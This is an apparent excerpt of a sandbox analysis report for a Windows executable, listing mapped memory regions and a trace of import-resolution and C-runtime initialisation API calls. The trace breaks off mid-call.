"\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 9756 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9757 start_va = 0x740000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 9758 start_va = 0x2d0000 end_va = 0x2f9fff entry_point = 0x2d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9759 start_va = 0x8d0000 end_va = 0xa57fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 9760 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9761 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9762 start_va = 0xa60000 end_va = 0xbe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 9763 start_va = 0xbf0000 end_va = 0x1feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 9764 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9765 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9766 start_va = 0x740000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 9767 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Thread: id = 973 os_tid = 0x24c [0295.296] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0295.296] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0295.296] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0295.296] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0295.296] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0295.297] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0295.298] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0295.299] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0295.300] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0295.301] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0295.302] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0295.302] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0295.303] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0295.303] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0295.303] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0295.303] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0295.304] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0295.304] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0295.304] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0295.305] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0295.305] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0295.305] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0295.305] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0295.305] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0295.305] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0295.305] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0295.305] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0295.305] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0295.305] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5d7fec61, dwHighDateTime=0x1d45ac6)) [0295.305] GetCurrentThreadId () returned 0x24c [0295.305] GetCurrentProcessId () returned 0xec0 [0295.305] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34276808434) returned 1 [0295.306] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0295.306] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0295.307] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0295.308] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0295.602] GetCurrentThreadId () returned 0x24c [0295.602] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xa7a52c92, hStdError=0x475810)) [0295.602] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0295.602] GetFileType (hFile=0x38) returned 0x2 [0295.602] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.602] GetFileType (hFile=0x3c) returned 0x2 [0295.602] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0295.602] GetFileType (hFile=0x40) returned 0x2 [0295.602] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c -y -p handles -nobanner" [0295.602] GetEnvironmentStringsW () returned 0x551e48* [0295.606] FreeEnvironmentStringsW (penv=0x551e48) returned 1 [0295.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] GetACP () returned 0x4e4 [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] IsValidCodePage (CodePage=0x4e4) returned 1 [0295.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0295.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.608] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0295.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.608] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 